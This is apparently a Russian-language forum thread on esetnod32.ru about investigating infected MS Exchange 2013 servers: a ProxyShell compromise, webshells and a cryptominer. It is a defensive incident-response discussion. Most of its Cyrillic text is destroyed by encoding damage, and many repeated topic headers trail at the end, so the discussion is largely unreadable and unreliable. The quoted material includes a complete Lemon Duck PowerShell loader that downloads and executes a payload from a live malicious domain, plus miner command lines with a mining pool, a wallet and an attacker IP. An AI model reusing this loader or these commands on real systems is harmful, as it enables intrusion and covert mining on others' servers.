�� esetnod32.ru [��: �� MS Exchange 2013]

�� MS Exchange 2013

Sat, 21 Aug 2021 13:06:49 +0300

�� MS Exchange 2013 � �� .

====quote====
�� :
��. �� . �� , �� . �� .
=============
� �� DNS �� , �� ?
21.08.2021 13:06:49, santy.

�� MS Exchange 2013

Mon, 16 Aug 2021 10:39:14 +0300

�� MS Exchange 2013 � �� .
��. �� . �� , �� . �� .
16.08.2021 10:39:14, �� .

�� MS Exchange 2013

Fri, 13 Aug 2021 10:56:20 +0300

�� MS Exchange 2013 � �� .

====quote====
RP55 RP55 ��:
+
https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html
=============

�� RP55, �� ,
�� , �� , �� (�� ), �� .

====code====

"C:\Windows\system32\cmd.exe" /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\eLocalTMn',[ref]$localTMn)}catch{};$ifmd5='4001ba98a424fdb63047a23af97asd123';$ifp=$env:tmp+'\m6.bin';$down_url='����://[B]d.hwqloan.com[/B]';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&VMCTFH-MAIL^^^&36780342-A764-974C-DAE2-ACFBD65CC3C0^^^&00:50:56:83:FF:5F');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'\m6.bin.ori';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)^^^|Get-Random -Count 100));test1 -PEBytes $bin|CzdpTG6VH1.exe - &cmd /c copy /y %tmp%\m6.bin.ori %tmp%\m6.bin.exe & %tmp%\m6.bin.exe

=============
�� . �� .

(�� , �� )
13.08.2021 10:56:20, santy.

�� MS Exchange 2013

Fri, 13 Aug 2021 09:25:41 +0300

�� MS Exchange 2013 � �� .
�� .

�� , � �� 15.0.1497.2 ��
Microsoft Exchange Server 2013 Cumulative Update 23
��
Exchange Server 2013 CU23 18 �� 2019 �. 15.0.1497.2 15.00.1497.002

��
Exchange Server 2013 CU23 18 �� 2019 �. 15.0.1497.2 15.00.1497.002
�� :

Exchange Server 2013 CU23 Jul21SU 13 �� 2021 �. 15.0.1497.23 15.00.1497.023
Exchange Server 2013 CU23 May21SU 11 �� 2021 �. 15.0.1497.18 15.00.1497.018
Exchange Server 2013 CU23 Apr21SU 13 �� 2021 �. 15.0.1497.15 15.00.1497.015
Exchange Server 2013 CU23 Mar21SU 2 �� 2021 �. 15.0.1497.12 15.00.1497.012

��,
�� ,
� ��,
�� Microsoft Exchange Server 2013

https://docs.microsoft.com/ru-ru/exchange/new-features/build-numbers-and-release-dates
13.08.2021 09:25:41, santy.

�� MS Exchange 2013

Fri, 13 Aug 2021 05:45:21 +0300

�� MS Exchange 2013 � �� .
�� .

ProxyShell �� -��
� �� -�� 265 �� c: \ inetpub \ wwwroot \ aspnet_client \.
��-�� , �� Microsoft Exchange.
�� -�� -�� C: \ Windows \ System32
�� , � �� -�� ASPX �� .
C: \ Program Files \ Microsoft \ Exchange Server \ V15 \ FrontEnd \ HttpProxy \ owa \ auth \
�� -�� (��: createhidetask.exe), �� (��:PowerManager), �� (��:ApplicationUpdate.exe ) � 1 �� .
�� ApplicationUpdate.exe - �� .NET, �� .
�ApplicationUpdate.exe - �� .NET, �� .NET � �� (�� )

https://www.bleepingcomputer.com/news/microsoft/hackers-now-backdoor-microsoft-exchange-using-proxyshell-exploits/

�� : (�� 28.07)

====quote====
Backdoor.Hafnium.Shell, C:\USERS\M.KONDRATENKO\APPDATA\ROAMING\Microsoft\Windows\Recent\iisstart.aspx.lnk, �� , 16927, 926908, , , , , ED05CFED65BC2E502E951C135327EBB7, 76988CB834B065119A6960092FF61CAF7FA24DBC9F65E8EF469A2F6EB22F6597
Backdoor.Hafnium.Shell, C:\INETPUB\WWWROOT\ASPNET_CLIENT\SYSTEM_WEB\IISSTART.ASPX, �� , 16927, 926908, 1.0.43628, , ame, , 0D5FB80F2F6ABF8182E82DC680F8F4B8, E9AB861970DDC99D06914A71D089EBA4E42F3216AEA3A43E1FD551FBDF9A0E16

=============

+

====quote====
-�� -��-
��: ��
��:
IP-��: 192.227.134.73
��: 443
��: ��
��: System
=============

��, �� , �� , �� .
13.08.2021 05:45:21, santy.

�� MS Exchange 2013

Mon, 09 Aug 2021 17:57:57 +0300

�� MS Exchange 2013 � �� .
��,
�� . ��:
====code====

44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZYZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX

=============
��, ��
+
pool.supportxmr.com:443

Apr 29 2021

====quote====
Exchange Server Vulnerability - Still Having Issues after all Patch and CU20 Updates

Hello everyone,

As per Microsoft Recommendations, we already installed all security patches earlier in the March and installed CU 20 updates. Here are the details about our issues. Any help on this will be appreciated:

Issue: High CPU utilization due to cmd.exe process

Exchange 2016 Standard

Work done so far:
All patches installed, CU 20 installed, Performed multiple scan with Microsoft Safety Scanner, every time it finds and remove "Backdoor:MSIL/Chopper.F!dha " but next day same issue occurs

Opened CMD.exe file with process explorer today and found following scripts:
====code====

C:\Windows\System32\cmd.exe -o 95.216.46.125:443 -u 44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZYZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX -k --tls -p MOON

=============
Also ran Exchange Mitigation Tool and it did not found anything.
=============

https://docs.microsoft.com/en-us/answers/questions/376174/exchange-server-vulnerability-still-having-issues.html
09.08.2021 17:57:57, santy.

�� MS Exchange 2013

Mon, 09 Aug 2021 13:29:25 +0300

�� MS Exchange 2013 � �� .

====quote====
�� :
santy ��:1. �� .

� �� , 03:48:12 [2021.07.30] � 17:34:15 [2021.08.07]��
=============

��,
�� , �� -�� , �� .

�� 2021.07.30 � ��

� �� 2021.08.07 �� , � �� , ��

17:34:15 [2021.08.07] �� SPHVMAIL01
17:43:35 [2021.08.07] �� IZTVMAIL01

� �� , ��, ��

�� , �� , ��
+ �� (�� , �� )
---------
�� ProxyShell

ProxyShell - �� , �� Microsoft Exchange.

�� (CAS) Microsoft Exchange, �� 443 � IIS.

� �� ProxyShell �� :

CVE-2021-34473 - Pre-auth Path Confusion leads to ACL Bypass (�� KB5001779)
CVE-2021-34523 - �� Exchange PowerShell (�� , KB5001779)
CVE-2021-31207 - �� RCE (�� KB5003435)

https://www.bleepingcomputer.com/news/microsoft/microsoft-exchange-servers-scanned-for-proxyshell-vulnerability-patch-now/

�� , �� (��
17:34:15 [2021.08.07] �� SPHVMAIL01
17:43:35 [2021.08.07] �� IZTVMAIL01

====quote====
�� "� �� ". � �� , �� (�� ) � �� ?
=============

��, �� DNS �� , �� .
� ��, �� uVS, �� .
�� .
(��, �� : � �� DNS)
��, �� :
"�� "
�� "
� "�� ".

�� , �� ,
��
�� , �� uVS �� , �� ,
��
+
�� .

�� , �� .
09.08.2021 13:29:25, santy.

�� MS Exchange 2013

Mon, 09 Aug 2021 12:30:48 +0300

�� MS Exchange 2013 � �� .
� �� "�� ", �.�. �� , �� . �.�. �� , �� , � �� . �� , �� .
� �� 443 ��, �� . �� , ��. �� . �� ...
09.08.2021 12:30:48, �� .

�� MS Exchange 2013

Mon, 09 Aug 2021 11:51:25 +0300

�� MS Exchange 2013 � �� .

====quote====
RP55 RP55 ��:
�� ?
=============
��. �� , �� (� �� ).

====quote====
santy ��:
1. �� .
=============
� �� , 03:48:12 [2021.07.30] � 17:34:15 [2021.08.07]
====quote====
santy ��:
3. �� - �� , �� .
=============
�� 95.216.46.0

====quote====
santy ��:
5. ��, �� DNS (� �� ), �� 512�� - �� , �� 512 - �� ,
=============
�� "� �� ". � �� , �� (�� ) � �� ?
09.08.2021 11:51:25, �� .

�� MS Exchange 2013

Sun, 08 Aug 2021 04:25:55 +0300

�� MS Exchange 2013 � �� .

====quote====
DNS ��: 0
�� : 0
�� : 1
�� : 1
=============
�� - �� , �� +�� DNS.

�� (�� : IZTVMAIL01)

====quote====
pid=7260 NT AUTHORITY\��
17:43:35 [2021.08.07]
cmdline=C:\Windows\System32\rundll32.exe -o pool.supportxmr.com:443 -u 44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZYZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX -k --tls -p MOON
CPU 1013,99%
parentid=13100 �� , �� .
192.168.24.26:38069 <-> 95.216.46.125:443
=============

�� (�� : SPHVMAIL01) �� .

====quote====
C:\Windows\System32\rundll32.exe -o pool.supportxmr.com:443 -u 44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZYZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX -k --tls -p MOON
17:34:15 [2021.08.07]
parentid=27320
192.168.10.26:51537 <-> 95.216.46.125:443
----------------
=============
�� , �� - �� (17:**:** [2021.08.07].
� WMI - ��

� ��. �� 30.07
NT AUTHORITY\��
C:\Windows\System32\rundll32.exe -o pool.supportxmr.com:443 -u 44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZYZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX -k --tls -p MOON
03:48:12 [2021.07.30]
1001,31%
192.168.24.26:60064 <-> 95.216.46.125:443 /WHOIS: country: FI/
----------------

��:
1. �� .
2. ��
3. �� - �� , �� .

4. �� ESETlogCollector (� �� ), �� , �� pid=13100, pid=27320

5. ��, �� DNS (� �� ), �� 512�� - �� , �� 512 - �� ,
08.08.2021 04:25:55, santy.

�� MS Exchange 2013

Sun, 08 Aug 2021 00:48:11 +0300

�� MS Exchange 2013 � �� .
� SPHVMAIL01
��: RemoteAdmin
�� C:\PROGRAM FILES (X86)\LITEMANAGER PRO - SERVER\ROMSERVER.EXE
�� ROMSERVER.EXE

��
��
File_Id 573EB6C862B000
Linker 2.25
�� 5890016 ��
�� 20.05.2016 � 10:06:30
�� 20.05.2016 � 10:06:30

TimeStamp 20.05.2016 � 07:03:36
EntryPoint +
OS Version 5.0
Subsystem Windows graphical user interface (GUI) subsystem
IMAGE_FILE_DLL -
IMAGE_FILE_EXECUTABLE_IMAGE +
�� ROMSERVER.EXE
�� 32-� ��
��. �� , �� Yakhnovets Denis Aleksandrovich IP

�� 4.7.2.0

��. ��
SHA1 1D3A7A4B1A57192A9187D5901D38495B0F7888CB
MD5 1A0C89DC5D3814C030DCAC5BD88349F9

��
SHORTCUT C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\LITEMANAGER PRO - SERVER\Settings for LM-Server.lnk
SHORTCUT C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\LITEMANAGER PRO - SERVER\Start LM-Server.lnk
SHORTCUT C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\LITEMANAGER PRO - SERVER\Stop LM-Server.lnk

�� ?
08.08.2021 00:48:11, RP55 RP55.

�� MS Exchange 2013

Sat, 07 Aug 2021 23:55:47 +0300

�� MS Exchange 2013 � �� .
�� .
�� , �� .
IZTVMAIL01_2021-08-07_22-10-07_v4.11.8.7z
SPHVMAIL01_2021-08-07_22-09-20_v4.11.8.7z
07.08.2021 23:55:47, �� .

�� MS Exchange 2013

Wed, 04 Aug 2021 13:28:06 +0300

�� MS Exchange 2013 � �� .
�� �� UVS 4.11.8 �� (�� 39+��)
� �� .
�� (� �� )
(+ �� autoruns � Esetlogcollector)

�� DNS � �� .
4.11.8

====quote====
o �� DNS �� , #41 � #42.
DNS �� Win8 (� �� ) � � Win8.1 � ��.
�� Windows 10,
� �� 42 ��.
(Win7 � �� ).

=============
�� , �� DNS
04.08.2021 13:28:06, santy.

�� MS Exchange 2013

Wed, 04 Aug 2021 11:28:04 +0300

�� MS Exchange 2013 � �� .

====quote====
santy ��:
�� ESETlogCollector �� IZTVMAIL01, �� -�� 30.07(�� , �� ) https://forum.esetnod32.ru/forum9/topic10671/
=============
��.
�� . �� \�� 39 + �� . � �� . ��.
ELC_logs.zip
04.08.2021 11:28:04, �� .

�� MS Exchange 2013

Tue, 03 Aug 2021 13:09:19 +0300

�� MS Exchange 2013 � �� .
��,

�� ESETlogCollector �� IZTVMAIL01, �� -�� 30.07
(�� , �� )
https://forum.esetnod32.ru/forum9/topic10671/

+
�� WMI,
https://www.fireeye.com/blog/threat-research/2016/08/wmi_vs_wmi_monitor.html
03.08.2021 13:09:19, santy.

�� MS Exchange 2013

Tue, 03 Aug 2021 10:22:29 +0300

�� MS Exchange 2013 � �� .
�� , � �� ... �� . �� , �� . �� .
03.08.2021 10:22:29, �� .

�� MS Exchange 2013

Tue, 03 Aug 2021 09:23:57 +0300

�� MS Exchange 2013 � �� .

====quote====
�� :
� �� , �� ?
=============
SIEM ��, �� , �� .�.
�� uVS, autoruns - �� , �� , �� .
03.08.2021 09:23:57, santy.

�� MS Exchange 2013

Mon, 02 Aug 2021 16:32:17 +0300

�� MS Exchange 2013 � �� .
��, �� WMI, � ��,
02.08.2021 16:32:17, santy.

�� MS Exchange 2013

Mon, 02 Aug 2021 14:43:24 +0300

�� MS Exchange 2013 � �� .
��.
IZTVMAIL01_2021-08-02_14-24-38_v4.11.7.7z

02.08.2021 14:43:24, �� .

�� MS Exchange 2013

Mon, 02 Aug 2021 13:17:25 +0300

�� MS Exchange 2013 � �� .
��.

�� IZTVMAIL01

�� auturuns+ �� , �� WMI ��-�� .

��
��
(�� , �� , �� , � �� )

[FILE ID=119969]

�� DNS �� :
regt 40 - �� 39 (�� ) �� 1 ��, �� .
regt 40 & restart - �� 39 (+��) - �� , � �� .

02.08.2021 13:17:25, santy.

�� MS Exchange 2013

Mon, 02 Aug 2021 11:28:22 +0300

�� MS Exchange 2013 � �� .

====quote====
santy ��:
��, �� :

1. �� ?
��
�� : IZTVMAIL01
�� :
03:48:12 [2021.07.30]
2. �� ?
=============
�� , �� 40 ��, �.�. �� , �� . � �� WMI
�� ! � �� . �� , �� . � �� , �� (��) �� , �� WMI ��.
�� , �� WMI �� . �� , �� 39 ��.
� �� , �� ?
02.08.2021 11:28:22, �� .

�� MS Exchange 2013

Sun, 01 Aug 2021 15:12:14 +0300

�� MS Exchange 2013 � �� .
��, �� :

1. �� ?
��
�� : IZTVMAIL01
�� :
03:48:12 [2021.07.30]
2. �� ?
01.08.2021 15:12:14, santy.

�� MS Exchange 2013

Sun, 01 Aug 2021 13:26:33 +0300

�� MS Exchange 2013 � �� .

====quote====
�� :
� �� 39 � �� . �� , �� . �� , � �� 40 �� 39 ��, � �� . � �� ?
=============
�� , �� ,
��, �� , ��
�� 40 (�� ), ��
01.08.2021 13:26:33, santy.

�� MS Exchange 2013

Sun, 01 Aug 2021 13:23:22 +0300

�� MS Exchange 2013 � �� .
�� , �� 3 ��.

1. ��, �� 39 � ��.

��, ��, ��

�� dns � �� 39 �� .

�� 30-5� �� (�� ) �� DNS �� 500��, ��, �� ,
�� , �� .

2.
��, ��, �� rundll32.exe ��

====quote====
NT AUTHORITY\��
C:\Windows\System32\rundll32.exe -o pool.supportxmr.com:443 -u 44EspGiviPdeZSZyX1r3R9RhpGCkxYACEKUwbA4Gp6cVCzyiNeB21STWYsJZYZeZt63JaUn8CVxDeWWGs3f6XNxGPtSuUEX -k --tls -p MOON
=============

01.08.2021 13:23:22, santy.

�� MS Exchange 2013

Sun, 01 Aug 2021 12:57:48 +0300

�� MS Exchange 2013 � �� .

====quote====
santy ��:
�� :
��
�� BITS, �� , � �� 5-10 �� , �� bits
=============
��, �� , �� . �� . �� , � �� )))
====quote====
santy ��:
1. �� , �� , �� -�� WMI �� .2. �� - �� , � �� 3. �� - ��, �� (�� )4. �� - �� uVS 4.11.7 (�� 39+�� )
=============
1. �� ?
====quote====

====quote====
santy ��:
�� . �� :��(!) �� DNS �� 512mb �� , �� 30-50 ��, (!) �� . �.�. �� n �� . � �� .
=============

=============
�� ... �� ? �� : �� \�� . � �� 39 � �� . �� , �� . �� , � �� 40 �� 39 ��, � �� . � �� ? �� 39 �� , �� ?
2.�� , �� , �� . �� . 587, 465, 443. �� , �� . �� , �� , �� , �� .
3. �� , �� .
4. ��, �� .
01.08.2021 12:57:48, �� .

�� MS Exchange 2013

Sun, 01 Aug 2021 12:15:26 +0300

�� MS Exchange 2013 � �� .

====quote====
�� :
��, �� , �� uVS v4.11.6 ��...
=============
�� :
��
�� BITS, �� , � �� 5-10 �� , �� bits
01.08.2021 12:15:26, santy.

�� MS Exchange 2013

Sun, 01 Aug 2021 12:07:50 +0300

�� MS Exchange 2013 � �� .
��.

1. �� , �� , �� -�� WMI �� .
2. �� - �� , � ��
3. �� - ��, �� (�� )
4. �� - �� uVS 4.11.7 (�� 39+�� )

====code====

;uVS v4.11.7 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
regt 39
restart

=============

�� . �� :

====quote====
(!) �� DNS �� 512mb �� , �� 30-50 ��,
(!) �� .
=============

�.�. �� n �� . � �� .

+ �� (� �� ), �� DNS �� .
====code====

;uVS v4.11.7 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
regt 40
restart

=============
01.08.2021 12:07:50, santy.

�� MS Exchange 2013

Sun, 01 Aug 2021 12:04:23 +0300

�� MS Exchange 2013 � �� .

====quote====
santy ��:
;uVS v4.11.7 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
regt 39
restart
=============
��, �� , �� uVS v4.11.6 ��... �� . �� , �� . �� IZTVMAIL01 �� , ��.
C:\Users\All Users\Malwarebytes\MBAMService\Quarantine - �� .

�� !
01.08.2021 12:04:23, �� .

�� MS Exchange 2013

Sun, 01 Aug 2021 10:37:45 +0300

�� MS Exchange 2013 � �� .
�� . �� , � �� .�. �� . ��, �� , �� , � �� . � �� , �.�. �� . �� , �� .
�� , �� . � �� .
�� .
01.08.2021 10:37:45, �� .

�� MS Exchange 2013

Sat, 31 Jul 2021 08:53:38 +0300

�� MS Exchange 2013 � �� .
��, �� - �� WMI ��
31.07.2021 08:53:38, santy.

����� esetnod32.ru [����: ������ ������� �� �������� � MS Exchange 2013]

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

������ ������� �� �������� � MS Exchange 2013

�� esetnod32.ru [��: �� MS Exchange 2013]

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013

�� MS Exchange 2013